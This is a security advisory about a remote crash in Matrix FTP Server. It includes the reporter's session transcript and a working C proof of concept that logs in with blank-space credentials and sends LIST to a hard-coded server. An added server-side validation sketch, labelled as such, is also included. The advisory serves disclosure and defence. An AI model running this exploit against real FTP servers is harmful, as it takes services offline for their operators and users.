SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   Matrix FTP Server
Vendors:   Matrix Servers
Matrix FTP Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008970
SecurityTracker URL:  http://securitytracker.com/id/1008970
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 6 2004
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   ATmaCA reported a vulnerability in the Matrix FTP Server. A remote user can cause the FTP service to crash.

It is reported that a remote user can log in with a special username and password (four spaces for the username, and four spaces for the password) and then send the FTP LIST command to the target server to cause the FTP service to crash.

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.matrix-servers.com/index.html
Cause:   Exception handling error
Underlying OS:  

Message History:   None.
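
A server-side check for the login sequence described above (blank USER and PASS, then LIST), as an added example that is not from the advisory, the reporter or the vendor. The advisory gives the cause only as an exception handling error, so this sketch assumes the blank credentials should have been refused before LIST was ever processed; the type and function names and the demo account are hypothetical.

```c
#include <ctype.h>
#include <string.h>

enum ftp_state { ST_NEW, ST_NEED_PASS, ST_AUTHED };        /* hypothetical names */
struct ftp_session { enum ftp_state state; char user[64]; };

/* Copy the argument after the verb into out, trimmed; -1 if it does not fit. */
static int ftp_arg(const char *line, char *out, size_t outsz)
{
    const char *p = line, *e;
    while (*p && !isspace((unsigned char)*p)) p++;          /* skip the verb */
    while (isspace((unsigned char)*p)) p++;                 /* leading blanks */
    e = p + strlen(p);
    while (e > p && isspace((unsigned char)e[-1])) e--;     /* trailing CRLF */
    if ((size_t)(e - p) >= outsz) return -1;
    memcpy(out, p, (size_t)(e - p));
    out[e - p] = '\0';
    return (int)(e - p);
}

static int is_verb(const char *l, const char *v)
{
    size_t n = strlen(v);
    return !strncmp(l, v, n) && (!l[n] || isspace((unsigned char)l[n]));
}

/* Return the RFC 959 reply code for one command line. */
int ftp_handle(struct ftp_session *s, const char *line)
{
    char arg[64];
    int n = ftp_arg(line, arg, sizeof arg);
    if (is_verb(line, "USER")) {
        s->state = ST_NEW;                       /* USER always restarts login */
        if (n <= 0) return 501;                  /* blank or oversized name */
        strcpy(s->user, arg);
        s->state = ST_NEED_PASS;
        return 331;
    }
    if (is_verb(line, "PASS")) {
        if (s->state != ST_NEED_PASS) return 503;    /* no valid USER yet */
        s->state = ST_NEW;                       /* failed PASS resets login */
        if (n <= 0) return 501;                  /* blank or oversized password */
        /* Constructed demo account; a real server queries its account store. */
        if (strcmp(s->user, "demo") || strcmp(arg, "demo-pass")) return 530;
        s->state = ST_AUTHED;
        return 230;
    }
    if (is_verb(line, "LIST")) return s->state == ST_AUTHED ? 150 : 530;
    return 502;
}
```

With this state machine the reported sequence ends in 501, 503 and 530 replies, and the session never reaches the directory-listing code.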


 Source Message Contents

Date:  Thu, 05 Feb 2004 18:13:32 +0000
Subject:  "Matrix FTP Server" may be crashed after logging in and sending the LIST command.


Application:  Matrix FTP server
              http://fasthost.co.uk/indexa_02_matrix.html

Bug:          Denial Of Service

Author:       ATmaCA
              e-mail: atmaca@prohack.net
              web: http://www.prohack.net


--The bug:
Matrix FTP Server may be crashed by sending the LIST command after logging in.

To test the vulnerability, simply log in to the FTP server with
"USER    \r\n" (USER [    ]) 4 spaces
"PASS    \r\n" (PASS [    ]) 4 spaces

After logging in, send the LIST command to the server.

-----------------------------------------------------------------------
220 Matrix FTP server (Server WLB#4) ready.
USER
331 User name okay, need password.
PASS
230 User logged in, proceed.
LIST
550 Access violation at address 0048FCC1 in module 'MatrixFTPServerSvc.exe'.
Write of address 00000030
-----------------------------------------------------------------------

and the FTP server may crash.


--The fix:
None exists.

//===========================================================
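#include <winsock2.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

int main(void)
{
        WSADATA W;
        SOCKET Sock;
        struct sockaddr_in Saddr;
        struct hostent *H;
        int res, err;
        char text[1024] = {' '};

        err = WSAStartup(0x101, &W);
        if (err != 0) return 1;

        Sock = socket(AF_INET, SOCK_STREAM, 0);
        memset(&Saddr, 0, sizeof(Saddr));
        Saddr.sin_family = AF_INET;
        Saddr.sin_port = htons(21);
        H = gethostbyname("ftp.fasthost.co.uk");
        if (H == NULL) return 1;                /* name did not resolve */
        memcpy(&Saddr.sin_addr, H->h_addr, H->h_length);
        printf("Connecting to server..\n");
        res = connect(Sock, (struct sockaddr *)&Saddr, sizeof(Saddr));
        if (res != 0) return 1;

        /* Server banner. recv() does not NUL-terminate, so do it here,
           and never pass received data as the printf format string. */
        res = recv(Sock, text, sizeof(text) - 1, 0);
        text[res > 0 ? res : 0] = '\0';
        printf("%s", text);

        /* User name of four spaces */
        strcpy(text, "USER    \r\n");
        res = send(Sock, text, (int)strlen(text), 0);
        printf("%s", text);

        res = recv(Sock, text, sizeof(text) - 1, 0);
        text[res > 0 ? res : 0] = '\0';
        printf("%s", text);

        /* Password of four spaces */
        strcpy(text, "PASS    \r\n");
        res = send(Sock, text, (int)strlen(text), 0);
        printf("%s", text);

        res = recv(Sock, text, sizeof(text) - 1, 0);
        text[res > 0 ? res : 0] = '\0';
        printf("%s", text);

        /* LIST after the blank login */
        strcpy(text, "LIST\r\n");
        res = send(Sock, text, (int)strlen(text), 0);
        printf("%s", text);

        res = recv(Sock, text, sizeof(text) - 1, 0);
        text[res > 0 ? res : 0] = '\0';
        printf("%s", text);

        closesocket(Sock);
        WSACleanup();

        return 0;
}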
//==========================================================


Copyright 2014, SecurityGlobal.net LLC